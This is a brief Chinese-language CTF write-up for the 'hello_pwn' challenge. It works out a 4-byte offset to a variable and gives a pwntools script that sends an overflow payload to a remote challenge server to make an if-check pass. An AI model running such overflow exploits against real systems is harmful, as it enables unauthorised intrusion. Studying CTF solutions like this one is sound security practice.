题目
由if条件:
单击进入unk_691968和dword_60106c得出偏移量为4,并且没有大于read函数的范围限制,所以我们构造payload=‘a’*4+p64(1853186401)就可以覆盖dword_60106c使if为真。
构造脚本(python):
from pwn import *
p = remote('111.198.29.45',31197)
p.recvuntil('lets get helloworld for bof\n')
payload = "A"*4 + p64(1853186401)
p.sendline(payload)
p.interactive()
Linux下执行命令python hello_pwn.py